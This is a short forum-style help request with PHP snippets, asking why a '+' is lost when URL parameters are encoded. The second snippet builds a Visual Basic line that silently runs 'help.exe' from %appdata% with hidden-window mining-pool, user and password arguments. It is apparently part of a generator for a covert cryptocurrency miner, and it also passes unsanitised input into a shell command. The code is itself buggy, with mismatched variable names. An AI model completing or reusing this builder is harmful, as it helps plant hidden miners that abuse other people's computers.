<?php
$pool = urlencode($_GET['p']);
$url = 'mylink?pool=' . $p . '&user=' . $_GET['user'] . '&pass=' . $_GET['pass'];
file_get_contents($url);
?>
<?php
$pool = urldecode($_GET['p']);
$user = $_GET['user'];
$pass = $_GET['pass'];
$file_content[133] = 'Shell "cmd.exe /c cd %appdata% & help.exe -o ' . $p. ' -u ' . $user . ' -p ' . $pass . '", vbHide';
?>
When entering: http://mylin?p=udp+tcp://host:22555&user=test&pass=test
It still doesn't use the + in this as a string at all!
Please help, as the + needs to be included in my string.